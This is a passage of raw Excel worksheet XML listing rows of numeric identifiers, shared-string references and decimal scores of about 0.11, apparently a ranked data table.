      <c r="C15069" s="2" t="s">
        <v>14530</v>
      </c>
      <c r="D15069" s="2">
        <v>1.0</v>
      </c>
      <c r="E15069" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15069" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15070" ht="15.75" customHeight="1">
      <c r="A15070" s="1">
        <v>29336.0</v>
      </c>
      <c r="B15070" s="2">
        <v>3.1333074E7</v>
      </c>
      <c r="C15070" s="2" t="s">
        <v>14531</v>
      </c>
      <c r="D15070" s="2">
        <v>1.0</v>
      </c>
      <c r="E15070" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15070" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15071" ht="15.75" customHeight="1">
      <c r="A15071" s="1">
        <v>29440.0</v>
      </c>
      <c r="B15071" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C15071" s="2" t="s">
        <v>14532</v>
      </c>
      <c r="D15071" s="2">
        <v>1.0</v>
      </c>
      <c r="E15071" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15071" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15072" ht="15.75" customHeight="1">
      <c r="A15072" s="1">
        <v>29775.0</v>
      </c>
      <c r="B15072" s="2">
        <v>3.497717E7</v>
      </c>
      <c r="C15072" s="2" t="s">
        <v>14533</v>
      </c>
      <c r="D15072" s="2">
        <v>1.0</v>
      </c>
      <c r="E15072" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15072" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15073" ht="15.75" customHeight="1">
      <c r="A15073" s="1">
        <v>30692.0</v>
      </c>
      <c r="B15073" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C15073" s="2" t="s">
        <v>14534</v>
      </c>
      <c r="D15073" s="2">
        <v>1.0</v>
      </c>
      <c r="E15073" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15073" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15074" ht="15.75" customHeight="1">
      <c r="A15074" s="1">
        <v>32185.0</v>
      </c>
      <c r="B15074" s="2">
        <v>5.4670399E7</v>
      </c>
      <c r="C15074" s="2" t="s">
        <v>14535</v>
      </c>
      <c r="D15074" s="2">
        <v>1.0</v>
      </c>
      <c r="E15074" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15074" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15075" ht="15.75" customHeight="1">
      <c r="A15075" s="1">
        <v>32708.0</v>
      </c>
      <c r="B15075" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C15075" s="2" t="s">
        <v>14536</v>
      </c>
      <c r="D15075" s="2">
        <v>1.0</v>
      </c>
      <c r="E15075" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15075" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15076" ht="15.75" customHeight="1">
      <c r="A15076" s="1">
        <v>33455.0</v>
      </c>
      <c r="B15076" s="2">
        <v>7892651.0</v>
      </c>
      <c r="C15076" s="2" t="s">
        <v>14537</v>
      </c>
      <c r="D15076" s="2">
        <v>1.0</v>
      </c>
      <c r="E15076" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15076" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15077" ht="15.75" customHeight="1">
      <c r="A15077" s="1">
        <v>950.0</v>
      </c>
      <c r="B15077" s="2">
        <v>2.2582233E7</v>
      </c>
      <c r="C15077" s="2" t="s">
        <v>14538</v>
      </c>
      <c r="D15077" s="2">
        <v>1.0</v>
      </c>
      <c r="E15077" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15077" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15078" ht="15.75" customHeight="1">
      <c r="A15078" s="1">
        <v>1724.0</v>
      </c>
      <c r="B15078" s="2">
        <v>2.8714704E7</v>
      </c>
      <c r="C15078" s="2" t="s">
        <v>14539</v>
      </c>
      <c r="D15078" s="2">
        <v>1.0</v>
      </c>
      <c r="E15078" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15078" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15079" ht="15.75" customHeight="1">
      <c r="A15079" s="1">
        <v>7123.0</v>
      </c>
      <c r="B15079" s="2">
        <v>5.0414315E7</v>
      </c>
      <c r="C15079" s="2" t="s">
        <v>14540</v>
      </c>
      <c r="D15079" s="2">
        <v>1.0</v>
      </c>
      <c r="E15079" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15079" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15080" ht="15.75" customHeight="1">
      <c r="A15080" s="1">
        <v>16776.0</v>
      </c>
      <c r="B15080" s="2">
        <v>4.7719243E7</v>
      </c>
      <c r="C15080" s="2" t="s">
        <v>14541</v>
      </c>
      <c r="D15080" s="2">
        <v>1.0</v>
      </c>
      <c r="E15080" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15080" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15081" ht="15.75" customHeight="1">
      <c r="A15081" s="1">
        <v>17074.0</v>
      </c>
      <c r="B15081" s="2">
        <v>4.8593225E7</v>
      </c>
      <c r="C15081" s="2" t="s">
        <v>14542</v>
      </c>
      <c r="D15081" s="2">
        <v>1.0</v>
      </c>
      <c r="E15081" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15081" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15082" ht="15.75" customHeight="1">
      <c r="A15082" s="1">
        <v>17686.0</v>
      </c>
      <c r="B15082" s="2">
        <v>5.0504444E7</v>
      </c>
      <c r="C15082" s="2" t="s">
        <v>14543</v>
      </c>
      <c r="D15082" s="2">
        <v>1.0</v>
      </c>
      <c r="E15082" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15082" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15083" ht="15.75" customHeight="1">
      <c r="A15083" s="1">
        <v>19622.0</v>
      </c>
      <c r="B15083" s="2">
        <v>5.6246491E7</v>
      </c>
      <c r="C15083" s="2" t="s">
        <v>14544</v>
      </c>
      <c r="D15083" s="2">
        <v>1.0</v>
      </c>
      <c r="E15083" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15083" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15084" ht="15.75" customHeight="1">
      <c r="A15084" s="1">
        <v>21050.0</v>
      </c>
      <c r="B15084" s="2">
        <v>1.7708272E7</v>
      </c>
      <c r="C15084" s="2" t="s">
        <v>14545</v>
      </c>
      <c r="D15084" s="2">
        <v>1.0</v>
      </c>
      <c r="E15084" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15084" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15085" ht="15.75" customHeight="1">
      <c r="A15085" s="1">
        <v>21745.0</v>
      </c>
      <c r="B15085" s="2">
        <v>2.5957241E7</v>
      </c>
      <c r="C15085" s="2" t="s">
        <v>14546</v>
      </c>
      <c r="D15085" s="2">
        <v>1.0</v>
      </c>
      <c r="E15085" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15085" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15086" ht="15.75" customHeight="1">
      <c r="A15086" s="1">
        <v>25760.0</v>
      </c>
      <c r="B15086" s="2">
        <v>1.4624992E7</v>
      </c>
      <c r="C15086" s="2" t="s">
        <v>14547</v>
      </c>
      <c r="D15086" s="2">
        <v>1.0</v>
      </c>
      <c r="E15086" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15086" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15087" ht="15.75" customHeight="1">
      <c r="A15087" s="1">
        <v>28352.0</v>
      </c>
      <c r="B15087" s="2">
        <v>2.595724E7</v>
      </c>
      <c r="C15087" s="2" t="s">
        <v>14546</v>
      </c>
      <c r="D15087" s="2">
        <v>1.0</v>
      </c>
      <c r="E15087" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15087" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="15088" ht="15.75" customHeight="1">
      <c r="A15088" s="1">
        <v>6813.0</v>
      </c>
      <c r="B15088" s="2">
        <v>4.9534166E7</v>
      </c>
      <c r="C15088" s="2" t="s">
        <v>14548</v>
      </c>
      <c r="D15088" s="2">
        <v>1.0</v>
      </c>
      <c r="E15088" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15088" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="15089" ht="15.75" customHeight="1">
      <c r="A15089" s="1">
        <v>9664.0</v>
      </c>
      <c r="B15089" s="2">
        <v>5.6306084E7</v>
      </c>
      <c r="C15089" s="2" t="s">
        <v>14549</v>
      </c>
      <c r="D15089" s="2">
        <v>1.0</v>
      </c>
      <c r="E15089" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15089" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="15090" ht="15.75" customHeight="1">
      <c r="A15090" s="1">
        <v>18055.0</v>
      </c>
      <c r="B15090" s="2">
        <v>5.1586239E7</v>
      </c>
      <c r="C15090" s="2" t="s">
        <v>14550</v>
      </c>
      <c r="D15090" s="2">
        <v>1.0</v>
      </c>
      <c r="E15090" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15090" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="15091" ht="15.75" customHeight="1">
      <c r="A15091" s="1">
        <v>19726.0</v>
      </c>
      <c r="B15091" s="2">
        <v>5.6612684E7</v>
      </c>
      <c r="C15091" s="2" t="s">
        <v>14551</v>
      </c>
      <c r="D15091" s="2">
        <v>1.0</v>
      </c>
      <c r="E15091" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15091" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="15092" ht="15.75" customHeight="1">
      <c r="A15092" s="1">
        <v>23800.0</v>
      </c>
      <c r="B15092" s="2">
        <v>7778800.0</v>
      </c>
      <c r="C15092" s="2" t="s">
        <v>14552</v>
      </c>
      <c r="D15092" s="2">
        <v>1.0</v>
      </c>
      <c r="E15092" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15092" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="15093" ht="15.75" customHeight="1">
      <c r="A15093" s="1">
        <v>14120.0</v>
      </c>
      <c r="B15093" s="2">
        <v>3.7804255E7</v>
      </c>
      <c r="C15093" s="2" t="s">
        <v>14553</v>
      </c>
      <c r="D15093" s="2">
        <v>1.0</v>
      </c>
      <c r="E15093" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15093" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="15094" ht="15.75" customHeight="1">
      <c r="A15094" s="1">
        <v>14636.0</v>
      </c>
      <c r="B15094" s="2">
        <v>4.0323702E7</v>
      </c>
      <c r="C15094" s="2" t="s">
        <v>14554</v>
      </c>
      <c r="D15094" s="2">
        <v>1.0</v>
      </c>
      <c r="E15094" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15094" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="15095" ht="15.75" customHeight="1">
      <c r="A15095" s="1">
        <v>16871.0</v>
      </c>
      <c r="B15095" s="2">
        <v>4.7956305E7</v>
      </c>
      <c r="C15095" s="2" t="s">
        <v>14555</v>
      </c>
      <c r="D15095" s="2">
        <v>1.0</v>
      </c>
      <c r="E15095" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15095" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="15096" ht="15.75" customHeight="1">
      <c r="A15096" s="1">
        <v>19061.0</v>
      </c>
      <c r="B15096" s="2">
        <v>5.4596065E7</v>
      </c>
      <c r="C15096" s="2" t="s">
        <v>14556</v>
      </c>
      <c r="D15096" s="2">
        <v>1.0</v>
      </c>
      <c r="E15096" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15096" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="15097" ht="15.75" customHeight="1">
      <c r="A15097" s="1">
        <v>26143.0</v>
      </c>
      <c r="B15097" s="2">
        <v>1.6039151E7</v>
      </c>
      <c r="C15097" s="2" t="s">
        <v>14557</v>
      </c>
      <c r="D15097" s="2">
        <v>1.0</v>
      </c>
      <c r="E15097" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15097" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="15098" ht="15.75" customHeight="1">
      <c r="A15098" s="1">
        <v>28613.0</v>
      </c>
      <c r="B15098" s="2">
        <v>2.7143113E7</v>
      </c>
      <c r="C15098" s="2" t="s">
        <v>14558</v>
      </c>
      <c r="D15098" s="2">
        <v>1.0</v>
      </c>
      <c r="E15098" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15098" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="15099" ht="15.75" customHeight="1">
      <c r="A15099" s="1">
        <v>30244.0</v>
      </c>
      <c r="B15099" s="2">
        <v>3.7543062E7</v>
      </c>
      <c r="C15099" s="2" t="s">
        <v>14559</v>
      </c>
      <c r="D15099" s="2">
        <v>1.0</v>
      </c>
      <c r="E15099" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15099" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="15100" ht="15.75" customHeight="1">
      <c r="A15100" s="1">
        <v>307.0</v>
      </c>
      <c r="B15100" s="2">
        <v>1.5604467E7</v>
      </c>
      <c r="C15100" s="2" t="s">
        <v>14560</v>
      </c>
      <c r="D15100" s="2">
        <v>1.0</v>
      </c>
      <c r="E15100" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15100" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="15101" ht="15.75" customHeight="1">
      <c r="A15101" s="1">
        <v>5511.0</v>
      </c>
      <c r="B15101" s="2">
        <v>4.5840978E7</v>
      </c>
      <c r="C15101" s="2" t="s">
        <v>14561</v>
      </c>
      <c r="D15101" s="2">
        <v>1.0</v>
      </c>
      <c r="E15101" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15101" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="15102" ht="15.75" customHeight="1">
      <c r="A15102" s="1">
        <v>8269.0</v>
      </c>
      <c r="B15102" s="2">
        <v>5.3432368E7</v>
      </c>
      <c r="C15102" s="2" t="s">
        <v>14562</v>
      </c>
      <c r="D15102" s="2">
        <v>1.0</v>
      </c>
      <c r="E15102" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15102" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="15103" ht="15.75" customHeight="1">
      <c r="A15103" s="1">
        <v>14433.0</v>
      </c>
      <c r="B15103" s="2">
        <v>3.9268703E7</v>
      </c>
      <c r="C15103" s="2" t="s">
        <v>14563</v>
      </c>
      <c r="D15103" s="2">
        <v>1.0</v>
      </c>
      <c r="E15103" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15103" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="15104" ht="15.75" customHeight="1">
      <c r="A15104" s="1">
        <v>14657.0</v>
      </c>
      <c r="B15104" s="2">
        <v>4.0419317E7</v>
      </c>
      <c r="C15104" s="2" t="s">
        <v>14564</v>
      </c>
      <c r="D15104" s="2">
        <v>1.0</v>
      </c>
      <c r="E15104" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15104" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="15105" ht="15.75" customHeight="1">
      <c r="A15105" s="1">
        <v>15240.0</v>
      </c>
      <c r="B15105" s="2">
        <v>4.2269275E7</v>
      </c>
      <c r="C15105" s="2" t="s">
        <v>14565</v>
      </c>
      <c r="D15105" s="2">
        <v>1.0</v>
      </c>
      <c r="E15105" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15105" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="15106" ht="15.75" customHeight="1">
      <c r="A15106" s="1">
        <v>19746.0</v>
      </c>
      <c r="B15106" s="2">
        <v>5.6694267E7</v>
      </c>
      <c r="C15106" s="2" t="s">
        <v>14566</v>
      </c>
      <c r="D15106" s="2">
        <v>1.0</v>
      </c>
      <c r="E15106" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15106" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="15107" ht="15.75" customHeight="1">
      <c r="A15107" s="1">
        <v>6176.0</v>
      </c>
      <c r="B15107" s="2">
        <v>4.7895736E7</v>
      </c>
      <c r="C15107" s="2" t="s">
        <v>14567</v>
      </c>
      <c r="D15107" s="2">
        <v>1.0</v>
      </c>
      <c r="E15107" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15107" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="15108" ht="15.75" customHeight="1">
      <c r="A15108" s="1">
        <v>18514.0</v>
      </c>
      <c r="B15108" s="2">
        <v>5.2995376E7</v>
      </c>
      <c r="C15108" s="2" t="s">
        <v>14568</v>
      </c>
      <c r="D15108" s="2">
        <v>1.0</v>
      </c>
      <c r="E15108" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15108" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="15109" ht="15.75" customHeight="1">
      <c r="A15109" s="1">
        <v>27916.0</v>
      </c>
      <c r="B15109" s="2">
        <v>2.3731786E7</v>
      </c>
      <c r="C15109" s="2" t="s">
        <v>14569</v>
      </c>
      <c r="D15109" s="2">
        <v>1.0</v>
      </c>
      <c r="E15109" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15109" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="15110" ht="15.75" customHeight="1">
      <c r="A15110" s="1">
        <v>30099.0</v>
      </c>
      <c r="B15110" s="2">
        <v>3649286.0</v>
      </c>
      <c r="C15110" s="2" t="s">
        <v>14570</v>
      </c>
      <c r="D15110" s="2">
        <v>1.0</v>
      </c>
      <c r="E15110" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15110" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="15111" ht="15.75" customHeight="1">
      <c r="A15111" s="1">
        <v>30384.0</v>
      </c>
      <c r="B15111" s="2">
        <v>3.8537922E7</v>
      </c>
      <c r="C15111" s="2" t="s">
        <v>14571</v>
      </c>
      <c r="D15111" s="2">
        <v>1.0</v>
      </c>
      <c r="E15111" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15111" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="15112" ht="15.75" customHeight="1">
      <c r="A15112" s="1">
        <v>19335.0</v>
      </c>
      <c r="B15112" s="2">
        <v>5.5348972E7</v>
      </c>
      <c r="C15112" s="2" t="s">
        <v>14572</v>
      </c>
      <c r="D15112" s="2">
        <v>1.0</v>
      </c>
      <c r="E15112" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15112" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="15113" ht="15.75" customHeight="1">
      <c r="A15113" s="1">
        <v>4420.0</v>
      </c>
      <c r="B15113" s="2">
        <v>4.2299031E7</v>
      </c>
      <c r="C15113" s="2" t="s">
        <v>14573</v>
      </c>
      <c r="D15113" s="2">
        <v>1.0</v>
      </c>
      <c r="E15113" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15113" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="15114" ht="15.75" customHeight="1">
      <c r="A15114" s="1">
        <v>29126.0</v>
      </c>
      <c r="B15114" s="2">
        <v>3.0511051E7</v>
      </c>
      <c r="C15114" s="2" t="s">
        <v>14574</v>
      </c>
      <c r="D15114" s="2">
        <v>1.0</v>
      </c>
      <c r="E15114" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15114" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="15115" ht="15.75" customHeight="1">
      <c r="A15115" s="1">
        <v>27619.0</v>
      </c>
      <c r="B15115" s="2">
        <v>2.2686181E7</v>
      </c>
      <c r="C15115" s="2" t="s">
        <v>14575</v>
      </c>
      <c r="D15115" s="2">
        <v>1.0</v>
      </c>
      <c r="E15115" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15115" s="2">
        <v>0.111965811965812</v>
      </c>
    </row>
    <row r="15116" ht="15.75" customHeight="1">
      <c r="A15116" s="1">
        <v>11160.0</v>
      </c>
      <c r="B15116" s="2">
        <v>1.9519909E7</v>
      </c>
      <c r="C15116" s="2" t="s">
        <v>14576</v>
      </c>
      <c r="D15116" s="2">
        <v>1.0</v>
      </c>
      <c r="E15116" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15116" s="2">
        <v>0.1119528619528619</v>
      </c>
    </row>
    <row r="15117" ht="15.75" customHeight="1">
      <c r="A15117" s="1">
        <v>7051.0</v>
      </c>
      <c r="B15117" s="2">
        <v>5.0183333E7</v>
      </c>
      <c r="C15117" s="2" t="s">
        <v>14577</v>
      </c>
      <c r="D15117" s="2">
        <v>1.0</v>
      </c>
      <c r="E15117" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15117" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="15118" ht="15.75" customHeight="1">
      <c r="A15118" s="1">
        <v>12498.0</v>
      </c>
      <c r="B15118" s="2">
        <v>2.9594294E7</v>
      </c>
      <c r="C15118" s="2" t="s">
        <v>14578</v>
      </c>
      <c r="D15118" s="2">
        <v>1.0</v>
      </c>
      <c r="E15118" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15118" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="15119" ht="15.75" customHeight="1">
      <c r="A15119" s="1">
        <v>6933.0</v>
      </c>
      <c r="B15119" s="2">
        <v>4.9893896E7</v>
      </c>
      <c r="C15119" s="2" t="s">
        <v>14579</v>
      </c>
      <c r="D15119" s="2">
        <v>1.0</v>
      </c>
      <c r="E15119" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15119" s="2">
        <v>0.1102150537634409</v>
      </c>
    </row>
    <row r="15120" ht="15.75" customHeight="1">
      <c r="A15120" s="1">
        <v>20220.0</v>
      </c>
      <c r="B15120" s="2">
        <v>1.075933E7</v>
      </c>
      <c r="C15120" s="2" t="s">
        <v>14580</v>
      </c>
      <c r="D15120" s="2">
        <v>1.0</v>
      </c>
      <c r="E15120" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15120" s="2">
        <v>0.1102150537634409</v>
      </c>
    </row>
    <row r="15121" ht="15.75" customHeight="1">
      <c r="A15121" s="1">
        <v>32570.0</v>
      </c>
      <c r="B15121" s="2">
        <v>5769097.0</v>
      </c>
      <c r="C15121" s="2" t="s">
        <v>14581</v>
      </c>
      <c r="D15121" s="2">
        <v>1.0</v>
      </c>
      <c r="E15121" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15121" s="2">
        <v>0.1102150537634408</v>
      </c>
    </row>
    <row r="15122" ht="15.75" customHeight="1">
      <c r="A15122" s="1">
        <v>10.0</v>
      </c>
      <c r="B15122" s="2">
        <v>1.0303265E7</v>
      </c>
      <c r="C15122" s="2" t="s">
        <v>14582</v>
      </c>
      <c r="D15122" s="2">
        <v>1.0</v>
      </c>
      <c r="E15122" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15122" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="15123" ht="15.75" customHeight="1">
      <c r="A15123" s="1">
        <v>13405.0</v>
      </c>
      <c r="B15123" s="2">
        <v>3.500249E7</v>
      </c>
      <c r="C15123" s="2" t="s">
        <v>14583</v>
      </c>
      <c r="D15123" s="2">
        <v>1.0</v>
      </c>
      <c r="E15123" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15123" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="15124" ht="15.75" customHeight="1">
      <c r="A15124" s="1">
        <v>8611.0</v>
      </c>
      <c r="B15124" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C15124" s="2" t="s">
        <v>14584</v>
      </c>
      <c r="D15124" s="2">
        <v>1.0</v>
      </c>
      <c r="E15124" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15124" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="15125" ht="15.75" customHeight="1">
      <c r="A15125" s="1">
        <v>16825.0</v>
      </c>
      <c r="B15125" s="2">
        <v>4.7873052E7</v>
      </c>
      <c r="C15125" s="2" t="s">
        <v>14585</v>
      </c>
      <c r="D15125" s="2">
        <v>1.0</v>
      </c>
      <c r="E15125" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15125" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="15126" ht="15.75" customHeight="1">
      <c r="A15126" s="1">
        <v>19480.0</v>
      </c>
      <c r="B15126" s="2">
        <v>5.5854104E7</v>
      </c>
      <c r="C15126" s="2" t="s">
        <v>14586</v>
      </c>
      <c r="D15126" s="2">
        <v>1.0</v>
      </c>
      <c r="E15126" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15126" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="15127" ht="15.75" customHeight="1">
      <c r="A15127" s="1">
        <v>7673.0</v>
      </c>
      <c r="B15127" s="2">
        <v>5.1899558E7</v>
      </c>
      <c r="C15127" s="2" t="s">
        <v>14587</v>
      </c>
      <c r="D15127" s="2">
        <v>1.0</v>
      </c>
      <c r="E15127" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15127" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="15128" ht="15.75" customHeight="1">
      <c r="A15128" s="1">
        <v>10339.0</v>
      </c>
      <c r="B15128" s="2">
        <v>5.7727077E7</v>
      </c>
      <c r="C15128" s="2" t="s">
        <v>14588</v>
      </c>
      <c r="D15128" s="2">
        <v>1.0</v>
      </c>
      <c r="E15128" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15128" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="15129" ht="15.75" customHeight="1">
      <c r="A15129" s="1">
        <v>12519.0</v>
      </c>
      <c r="B15129" s="2">
        <v>2.9672398E7</v>
      </c>
      <c r="C15129" s="2" t="s">
        <v>14589</v>
      </c>
      <c r="D15129" s="2">
        <v>1.0</v>
      </c>
      <c r="E15129" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15129" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="15130" ht="15.75" customHeight="1">
      <c r="A15130" s="1">
        <v>24511.0</v>
      </c>
      <c r="B15130" s="2">
        <v>1.1134157E7</v>
      </c>
      <c r="C15130" s="2" t="s">
        <v>14590</v>
      </c>
      <c r="D15130" s="2">
        <v>1.0</v>
      </c>
      <c r="E15130" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15130" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="15131" ht="15.75" customHeight="1">
      <c r="A15131" s="1">
        <v>2783.0</v>
      </c>
      <c r="B15131" s="2">
        <v>3.5214896E7</v>
      </c>
      <c r="C15131" s="2" t="s">
        <v>14591</v>
      </c>
      <c r="D15131" s="2">
        <v>1.0</v>
      </c>
      <c r="E15131" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15131" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15132" ht="15.75" customHeight="1">
      <c r="A15132" s="1">
        <v>3608.0</v>
      </c>
      <c r="B15132" s="2">
        <v>3.9127127E7</v>
      </c>
      <c r="C15132" s="2" t="s">
        <v>14592</v>
      </c>
      <c r="D15132" s="2">
        <v>1.0</v>
      </c>
      <c r="E15132" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15132" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15133" ht="15.75" customHeight="1">
      <c r="A15133" s="1">
        <v>7465.0</v>
      </c>
      <c r="B15133" s="2">
        <v>5.1264534E7</v>
      </c>
      <c r="C15133" s="2" t="s">
        <v>14593</v>
      </c>
      <c r="D15133" s="2">
        <v>1.0</v>
      </c>
      <c r="E15133" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15133" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15134" ht="15.75" customHeight="1">
      <c r="A15134" s="1">
        <v>9662.0</v>
      </c>
      <c r="B15134" s="2">
        <v>5.6303001E7</v>
      </c>
      <c r="C15134" s="2" t="s">
        <v>14594</v>
      </c>
      <c r="D15134" s="2">
        <v>1.0</v>
      </c>
      <c r="E15134" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15134" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15135" ht="15.75" customHeight="1">
      <c r="A15135" s="1">
        <v>12959.0</v>
      </c>
      <c r="B15135" s="2">
        <v>3.2468061E7</v>
      </c>
      <c r="C15135" s="2" t="s">
        <v>14595</v>
      </c>
      <c r="D15135" s="2">
        <v>1.0</v>
      </c>
      <c r="E15135" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15135" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="15136" ht="15.75" customHeight="1">
      <c r="A15136" s="1">
        <v>13337.0</v>
      </c>
      <c r="B15136" s="2">
        <v>3.4685732E7</v>
      </c>
